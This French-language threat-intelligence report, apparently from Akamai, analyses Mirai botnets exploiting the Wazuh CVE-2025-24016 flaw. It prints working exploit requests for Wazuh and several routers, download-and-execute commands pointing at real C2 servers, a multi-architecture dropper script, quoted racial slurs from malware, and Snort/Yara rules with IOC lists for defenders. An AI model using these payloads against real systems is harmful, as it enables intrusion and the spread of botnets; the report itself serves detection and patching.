Deux botnets, une faille : Mirai exploite une vulnérabilité de Wazuh pour se propager
Toutes les conclusions de cette étude ont été recueillies via des pots de miel de l'équipe SIRT et n'ont pas été observées sur les points de terminaison réels en production de Wazuh exécutant le logiciel Wazuh.
AVERTISSEMENT RELATIF AU CONTENU : Certaines des conventions de nommage utilisées par les attaquants et mentionnées dans cet article contiennent des insultes raciales et un langage explicite. Nous avons choisi de ne pas les censurer à des fins éducatives et de recherche. Ces termes ne reflètent en aucun cas les valeurs ou les opinions d'Akamai.
Synthèse
L'équipe Security Intelligence and Response Team (SIRT) d'Akamai a identifié une exploitation active de la vulnérabilité CVE-2025-24016, liée à l'exécution de code à distance critique, contre des serveurs Wazuh (CVSS 9.9).
Cette vulnérabilité profite des requêtes API décentralisées, permettant à un attaquant d'exécuter à distance un code en téléchargeant un dictionnaire non filtré.
Nous avons observé deux campagnes de variantes de Mirai exploitant cette vulnérabilité. L'une d'elles, « Resbot », a une nomenclature italienne impliquée dans ses domaines, probablement en rapport avec la géographie ou la langue cible parlée par le propriétaire du terminal concerné.
L'équipe SIRT d'Akamai a identifié pour la première fois une activité dans notre réseau mondial de pots de miel en mars 2025. Il s'agit de la première exploitation active de cette vulnérabilité signalée depuis la divulgation initiale en février 2025.
Les botnets exploitant cette vulnérabilité ont utilisé plusieurs vulnérabilités connues, y compris les vulnérabilités CVE-2023-1389, CVE-2017-17215, CVE-2017-18368, entre autres.
Nous avons inclus une liste d'indicateurs de compromission (IOC) à la fin de cet article de blog pour aider à la défense contre cette menace.
Introduction
L'équipe SIRT d'Akamai a observé des tentatives d'exploitation active de la vulnérabilité CVE-2025-24016 fin mars 2025, sur notre cluster de pots de miel exposés sur Internet. L'équipe SIRT a identifié deux botnets différents exploitant cette faille pour propager des variantes du logiciel malveillant Mirai sur les systèmes cibles vulnérables.
Qu'est-ce que la vulnérabilité CVE-2025-24016 ?
En février 2025, la vulnérabilité CVE-2025-24016 a été dévoilée dans le package de gestionnaire de la solution open source XDR et SIEM Wazuh. Elle concerne les versions 4.4.0 à 4.9.0 de Wazuh, avec un correctif publié dans la version 4.9.1. Cette vulnérabilité permet à un attaquant distant disposant d'un accès API d'exécuter du code arbitraire sur le serveur cible avec un fichier JSON élaboré de façon malveillante.
Dans l'API Wazuh, les paramètres dans DistributedAPI sont sérialisés au format JSON, puis désérialisés à l'aide de as_Wazuh_object dans le fichier framework/wazuh/core/cluster/common.py. Cela peut être exploité en injectant un dictionnaire non filtré dans les requêtes API décentralisées, ce qui peut conduire à l'évaluation d'un code Python arbitraire.
Fin février 2025, une démonstration de faisabilité a détaillé comment obtenir une RCE avec cette vulnérabilité. La RCE peut être déclenchée à l'aide du point de terminaison run_as, ce qui permet à l'attaquant de contrôler l'argument auth_context. Dans la démonstration de faisabilité, l'auteur montre cela en utilisant une requête Burp Suite contre l'URI /security/user/authenticate/run_as (Figure 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
Fig. 1 : Requête Burp Suite (Source : https://github.com/MuhammadWaseem29/CVE-2025-24016)
L'en-tête d'autorisation est codé en Base64 et la charge utile malveillante contient l'exception non filtrée __unhandled_exc_, qui déclenche l'exécution d'un code Python arbitraire. Dans ce cas, exit.
Exploitation active
Quelques semaines seulement après la divulgation, début mars 2025, l'équipe SIRT d'Akamai a découvert des tentatives d'exploitation de cette vulnérabilité Wazuh dans notre réseau mondial de pots de miel. Il s'agit du dernier exemple des délais d'exploitation toujours plus courts que les opérateurs de botnets ont adoptés pour les CVE récemment publiées.
L'en-tête d'autorisation codé en Base64 est décodé sur wazuh-wui:MyS3cr37P450r.*-, qui est identique à l'autorisation dans l'exploitation de la démonstration de faisabilité (Figure 2). Le point de terminaison et la structure de la requête correspondent à l'exploitation de la démonstration de faisabilité, mais ici, ils sont utilisés pour propager un logiciel malveillant.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 2 : La tentative d'exploitation n° 1 est identique à la démonstration de faisabilité
En outre, nous avons détecté des requêtes structurées de manière similaire ciblant le point de terminaison /Wazuh début mai 2025, qui sont différentes du point de terminaison cible standard pour cette vulnérabilité (Figure 3). Les requêtes étant presque identiques à celles de la démonstration de faisabilité, en plus du point de terminaison, il est probable que le botnet tente toujours d'exploiter la même vulnérabilité de Wazuh.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 3 : La tentative d'exploitation n° 2 est différente de la démonstration de faisabilité
Botnet 1 : plusieurs variantes de Mirai
L'exploitation active observée de cette vulnérabilité de Wazuh est liée à deux botnets distincts. Le premier botnet est lié aux premières tentatives de début mars 2025, au cours desquelles l'exploitation récupère et exécute un script shell malveillant qui sert de téléchargeur pour la charge utile principale des logiciels malveillants Mirai (Figure 4). Comme les scripts shell moyens que nous voyons souvent avec Mirai, il prend en charge une variété d'architectures différentes pour cibler principalement les terminaux IoT (Internet des objets).
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
Fig. 4 : Contenu du script shell w.sh
Ces exemples de logiciels malveillants Mirai, appelés « morte », semblent être des variantes de LZRD Mirai, qui existent depuis un certain temps. Ils se distinguent facilement par la chaîne unique codée en dur qu'ils impriment sur la console d'une machine cible lors de l'exécution : « lzrd here ».
Domaines associés observés
L'examen de l'adresse IP 176.65.134[.]62 a donné une résolution à un domaine de commande et de contrôle (C2) de nuklearcnc.duckdns[.]org. Il est important de noter que Duck DNS est un serveur DNS dynamique, et seul ce sous-domaine particulier est malveillant ici.
Ce domaine est également passé à 176.65.142.252 dans un délai similaire. Cette adresse IP a été résolue dans un autre domaine C2 appelé cbot.galaxias[.]cc. Grâce à VirusTotal, nous avons pu trouver ce qui semble être un RAT basé sur Windows, qui se déguise en processus svchost Windows et renvoie des balises au sous-domaine cbot.galaxias[.]cc pour C2.
Un autre sous-domaine, neon.galaxias[.]cc, était associé à ce qui semblait être une distribution et une communication de variante Mirai plus standard. L'une de ses adresses IP de résolution, 209.141.34[.]106, a également été résolue en deux autres domaines C2 : pangacnc[.]com, et jimmyudp-raw[.]xyz.
Le domaine jimmyudp-raw[.]xyz comportait trois échantillons de logiciels malveillants Mirai différents sur VirusTotal. Le premier, appelé « neon », est une variante de Mirai non identifiée qui s'est connectée à 65.222.202[.]53 sur le port 80 pour la communication C2, et contenait la chaîne de console codée en dur « fuck u nigga ».
La deuxième variante, appelée « k03ldc », semble être une version modifiée ou mise à niveau de la variante de Mirai V3G4. Contenant la chaîne de console codée en dur 666V3G4-Katana999, elle s'est connectée à 196.251.86[.]49 sur le port 36063 pour la communication C2.
Enfin, le troisième échantillon, appelé « KKveTTgaAAsecNNaaaa », est la variante originale de Mirai V3G4. Le logiciel malveillant se connecte à 209.141.34[.]106 sur le port 60195 pour la communication C2, et utilise la chaîne codée en dur « xXxSlicexXxxVEGA », en cas d'infection. Il détecte si une machine cible est déjà infectée par la variante V3G4 et, si tel est le cas, il imprime « We got this shit already » à la place de l'impression classique.
Le domaine pangacnc[.]com comportait deux échantillons de logiciels malveillants Mirai différents sur VirusTotal, l'un étant le logiciel malveillant nommé « KKveTTgaAAsecNNaaaa », qui est identique à celui mentionné précédemment. L'autre a été nommé « vision », et est une variante de LZRD Mirai qui se connecte à 65.222.202[.]53 via le port 80, tout comme l'échantillon « neon », provenant de l'autre domaine C2. Cela signifie qu'il est possible que le logiciel malveillant Mirai nommé « neon » soit une version modifiée de la variante de LZRD.
Autres vulnérabilités exploitées
En plus de cibler la RCE Wazuh, nous avons observé que ce botnet tentait d'exploiter une variété d'autres vulnérabilités connues. Il s'agit notamment de plusieurs vulnérabilités que nous avons observées comme étant exploitées (Figure 5, Figure 6 et Figure 7) et qui ont été documentées dans des articles de blog précédents.
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
Fig. 5 : Vulnérabilité Hadoop YARN
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
Fig. 6 : Injection de commande TP-Link Archer AX21 (voir https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
Fig. 7 : Exploitation RCE du routeur ZTE ZXV10 H108L (voir https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
Botnet 2 : botnet Resbot/Resentual
Le deuxième botnet que nous avons identifié a été tiré des tentatives effectuées sur le point de terminaison /Wazuh début mai 2025. Comme pour la première exploitation, il récupère et exécute un script shell malveillant pour servir de téléchargeur Mirai. Le logiciel malveillant, appelé « resgod », est identifié par sa chaîne de console codée en dur « Resentual got you! ». Également similaire au premier botnet, la charge utile cible une grande variété d'architectures visant les terminaux IoT.
L'une des choses intéressantes que nous avons remarquées à propos de ce botnet était le langage associé. Il utilisait une variété de domaines pour diffuser le logiciel malveillant qui avaient tous une nomenclature italienne. Les domaines tels que le système d'aide à la navigation gestisciweb.com, par exemple, se traduisent par « gestion Web ».
Ils ont l'air similaires à des noms de domaine malveillants qui sont souvent utilisés pour les attaques par hameçonnage, car ils paraissent beaucoup plus légitimes que leur C2 « resbot.online » (qui est plus clairement un domaine malveillant). Les conventions linguistiques utilisées pourraient indiquer une campagne visant spécifiquement les terminaux appartenant à des utilisateurs italophones et gérés par ces derniers.
Les chaînes présentes dans l'échantillon semblent ne pas être chiffrées et révèlent diverses failles et capacités d'analyse supplémentaires. L'adresse IP 104.168.101[.]27 est codée en dur dans le logiciel malveillant et est utilisée comme serveur C2 sur le port TCP 62627 (l'un des ports C2 possibles). En outre, nous avons constaté que ce botnet tentait de se propager via FTP sur le port 21 et d'effectuer une analyse Telnet.
Les différentes failles codées en dur sont visibles dans les figures 8, 9, 10 et 11.
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
Fig. 8 : RCE du routeur Huawei HG532 (voir https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
Fig. 9 : RCE Realtek SDK Miniigd UPnP SOAP (voir https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
Fig. 10 : Injection de commande pour le routeur TrueOnline ZyXEL P660HN-T v1 (voir https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
Figure 11 : Propagation via FTP
Conclusion
La propagation de Mirai se poursuit relativement sans entrave, car il reste assez simple de réutiliser et d'adapter l'ancien code source pour créer ou configurer de nouveaux botnets. De plus, les opérateurs de botnets peuvent souvent tirer le meilleur parti des nouvelles vulnérabilités publiées.
Bien que le programme CVE soit globalement bénéfique pour le secteur, il peut parfois être une arme à double tranchant lorsqu'il met en lumière des vulnérabilités qui auraient autrement pu passer inaperçues auprès des acteurs malveillants.
Les tentatives des chercheurs pour sensibiliser les entreprises à l'importance des vulnérabilités, en créant des démonstrations de faisabilité, continuent d'avoir des effets néfastes, et montrent à quel point il est crucial d'appliquer les correctifs dès leur publication. Les opérateurs de botnets gardent un œil sur certaines de ces divulgations de vulnérabilités et, en particulier lorsque des démonstrations de faisabilité sont mises à disposition, ils adaptent rapidement leur code pour faire proliférer leur botnet.
Contrairement à certaines vulnérabilités récemment signalées, qui n'affectent souvent que des terminaux obsolètes, la vulnérabilité CVE-2025-24016 affecte les serveurs Wazuh actifs exécutant des versions obsolètes. Il est fortement recommandé de procéder à la mise à jour vers la dernière version contenant un correctif, en l'occurrence, Wazuh version 4.9.1 ou une version ultérieure. Wazuh a publié des conseils sur la manière de sécuriser correctement les systèmes ; si ces recommandations sont suivies, cette campagne ne devrait pas poser de problème.
Suivez-nous
L'équipe SIRT d'Akamai continuera à surveiller ces menaces et à en rendre compte, tant pour nos clients que pour la communauté de la sécurité dans son ensemble. Pour rester au fait des publications de l'équipe SIRT et du groupe Security Intelligence d'Akamai, consultez notre page d'accueil de recherche et suivez-nous sur les réseaux sociaux.
IOCs
Nous avons inclus une liste d'indicateurs de compromission, ainsi que des règles Snort et Yara, pour aider les défenseurs.
Règles Snort pour les indicateurs de compromission du réseau
Règles Snort pour les IP C2 (botnet n° 1)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Règles Snort pour la détection de résolution de domaine C2 (botnet n° 1)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Règles Snort pour les IP C2 (botnet n° 2)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Règles Snort pour la détection de résolution de domaine C2 (botnet n° 2)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Règles Yara pour les échantillons de logiciels malveillants (botnet n° 1)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
Règles Yara pour les échantillons de logiciels malveillants (botnet n° 2)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
Adresses IPv4 malveillantes (botnet n° 1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
Domaines malveillants (botnet n° 1)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
Adresses IPv4 malveillantes (botnet n° 2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
Domaines malveillants (botnet n° 2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
Hachages SHA256 (botnet n° 1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
Hachages SHA256 (botnet n° 2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
